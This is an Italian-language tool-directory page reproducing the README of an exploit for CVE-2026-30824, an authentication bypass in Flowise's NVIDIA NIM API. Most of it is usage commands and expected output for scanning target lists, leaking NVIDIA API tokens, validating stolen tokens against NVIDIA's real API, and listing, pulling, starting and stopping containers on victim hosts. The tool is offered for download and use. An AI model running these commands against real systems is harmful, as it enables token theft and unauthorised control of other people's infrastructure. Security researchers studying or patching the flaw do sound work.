Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication — Un exploit proof-of-concept per **CVE-2026-30824**, una vulnerabilità critica di bypass dell'autenticazione in Flowise che espone gli endpoint API NVIDIA NIM senza autenticazione. | Kitploit
Strumenti/GitHubGitHub/dylvie/cve-2026-30824-flowise-nvidia-nim-authentication
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebTest di Sicurezza delle APIPenetration Testing
GitHubdylvie/cve-2026-30824-flowise-nvidia-nim-authentication

CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Un exploit proof-of-concept per **CVE-2026-30824**, una vulnerabilità critica di bypass dell'autenticazione in Flowise che espone gli endpoint API NVIDIA NIM senza autenticazione.

Vedi Repository
285 mesi faNon ancora revisionato
Condividi

CVE-2026-30824 — Checker ed Exploit per il Bypass dell'Autenticazione NVIDIA NIM in Flowise

Un checker e exploit proof-of-concept per CVE-2026-30824, una vulnerabilità critica di bypass dell'autenticazione in Flowise che espone gli endpoint API NVIDIA NIM senza autenticazione.

Panoramica della Vulnerabilità

CVE-2026-30824 è un bypass critico dell'autenticazione in Flowise (< 3.0.13) che consente a utenti remoti non autenticati di accedere alla gestione dei container NVIDIA NIM e agli endpoint di generazione dei token API.

CampoValore
Punteggio CVSS9.8 (Critico)
CWECWE-306: Autenticazione Mancante per Funzione Critica
Versioni InteressateFlowise < 3.0.13
ImpattoGestione completa dei container, accesso GPU, furto di token

Causa Principale

Il percorso /api/v1/nvidia-nim/* è nella whitelist del middleware globale di autenticazione, consentendo l'accesso non autenticato a:

  • Generazione e divulgazione di token
  • Gestione dei container (elenco, avvio, arresto)
  • Download di immagini Docker
  • Integrazione API NVIDIA

Funzionalità

✅ Rilevamento della Vulnerabilità — Verifica rapida se il target è vulnerabile
✅ Estrazione dei Token — Divulga i token API NVIDIA dagli endpoint vulnerabili
✅ Validazione dei Token — Verifica i token tramite l'API NVIDIA (dimostra il raggio d'impatto)
✅ Enumerazione dei Container — Elenca i container NIM in esecuzione
✅ Scansione in Lotto — Scansiona più target da un file
✅ Bypass SSL — Ignora i certificati autofirmati per impostazione predefinita
✅ Output Colorato — Indicatori di stato facili da leggere (verde/giallo/rosso)
✅ Ricognizione — Mappatura completa degli endpoint e diagnostica


Installazione

Prerequisiti

  • Python 3.7+
  • Libreria requests

Configurazione

# Clona o scarica lo script
git clone <repository>
cd cve-2026-30824

# Installa le dipendenze
pip install -r requirements.txt
# oppure
pip install requests

Utilizzo

Verifica di Base della Vulnerabilità

# Verifica se un singolo target è vulnerabile
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check

# Output atteso (VULNERABILE):
# [+] Il target risulta VULNERABILE (HTTP 200)
#     Risposta: {...}

Scansione di Più Target

# Crea targets.txt con un URL per riga
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF

# Scansiona tutti i target (modalità veloce, senza prompt)
python3 CVE-2026-30824.py -f targets.txt --scan-only

# Output di riepilogo atteso:
# ============================================================
# [*] Riepilogo Scansione
# ============================================================
# [+] VULNERABILI: 2
#     ✓ http://192.168.1.100:3000
#     ✓ http://192.168.1.101:3000
# [-] CORRETTI: 1
#     ✗ http://192.168.1.102:3000

Estrazione del Token API NVIDIA

# Divulga il token API NVIDIA dall'endpoint vulnerabile
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# Output atteso:
# [*] Tentativo di divulgazione del token API NVIDIA...
# [+] Token API NVIDIA: eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] Tipo di Token: Bearer
# [+] Scadenza tra: 3600s

Validazione del Token tramite l'API NVIDIA

# Verifica che un token divulgato funzioni con la vera API NVIDIA
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."

# Output atteso:
# [*] Validazione del token tramite l'API NVIDIA...
# [+] Token VALIDO! Accesso a 45 modelli NVIDIA NIM.
#     - mistralai/mistral-7b-instruct-v0.1
#     - meta-llama/llama2-70b
#     - (...)

Elenco dei Container in Esecuzione

# Enumera i container sul target
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers

# Output atteso:
# [*] Elenco dei container in esecuzione...
# [+] HTTP 200
# [
#   {
#     "id": "abc123xyz",
#     "names": ["flowise_nim"],
#     "image": "nvcr.io/nvidia/nim:latest",
#     "state": "running"
#   }
# ]

Ricognizione Completa (Tutti i Controlli)

# Esegue tutti i controlli di ricognizione sul target vulnerabile
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

Opzioni della Riga di Comando

usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
                             [--scan-only] [--get-token]
                             [--validate-token TOKEN] [--list-containers]
                             [--get-container CONTAINER_ID]
                             [--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
                             [--start-container IMAGE_TAG]
                             [--container-name CONTAINER_NAME]
                             [--stop-container CONTAINER_ID] [--preload]
                             [--all] [--timeout TIMEOUT] [--debug]

Argomenti opzionali:
  -h, --help                    Mostra questo messaggio di aiuto ed esci
  -t, --target TARGET           URL del target (es., http://192.168.1.100:3000)
  -f, --targets-file FILE       File con l'elenco dei target (uno per riga)
  
Rilevamento della Vulnerabilità:
  --check                       Verifica solo se il target è vulnerabile
  --scan-only                   Scansiona i target per la vulnerabilità senza prompt
  --debug                       Mostra i dettagli delle richieste e le risposte grezze
  
Sfruttamento:
  --get-token                   Divulga il token API NVIDIA
  --validate-token TOKEN        Valida il token divulgato tramite l'API NVIDIA
  --list-containers             Elenca i container NIM in esecuzione
  --get-container CONTAINER_ID  Ottieni i dettagli del container
  --get-image IMAGE_ID          Ottieni i dettagli dell'immagine
  --pull-image IMAGE_TAG        Scarica un'immagine Docker (es., nvcr.io/nvidia/nim:latest)
  --start-container IMAGE_TAG   Avvia un container da un tag di immagine
  --container-name NAME         Nome per il container avviato
  --stop-container CONTAINER_ID Arresta un container in esecuzione
  --preload                     Attiva l'endpoint di precaricamento delle risorse
  --all                         Esegue tutti i controlli di ricognizione
  
Avanzate:
  --timeout SECONDS             Timeout delle richieste in secondi (predefinito: 15)

Esempi di Flussi di Lavoro

Scenario 1: Valutazione della Rete Interna

# 1. Scansiona l'intera sottorete per istanze vulnerabili
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only

# 2. Per ogni target vulnerabile, estrai il token
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 3. Valida l'impatto del token
python3 CVE-2026-30824.py --validate-token "<token-estratto>"

Scenario 2: Prova dell'Impatto

# Verifica la vulnerabilità e dimostra l'intero raggio d'impatto
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

# Questo:
# 1. Verifica la vulnerabilità
# 2. Estrae il token API NVIDIA
# 3. Valida il token tramite l'API NVIDIA
# 4. Elenca i container in esecuzione
# 5. Mostra l'enumerazione delle risorse

Scenario 3: Monitoraggio Continuo

# Monitora un target periodicamente (tramite cron o scheduler)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log

Indicatori di Output

Colori

  • 🟢 VERDE — Target vulnerabile o sfruttamento riuscito
  • 🟡 GIALLO — Corretto/non vulnerabile o avviso
  • 🔴 ROSSO — Errore o errore di connessione

Codici di Stato

HTTPSignificato
200✅ Vulnerabile (endpoint accessibile)
400✅ Vulnerabile (errore dell'applicazione ma l'endpoint esiste)
401🟡 Corretto (autenticazione richiesta)
404🟡 Non Flowise o l'endpoint non esiste
5xx🔴 Errore del server/configurazione errata

Risoluzione dei Problemi

Scarica lo strumento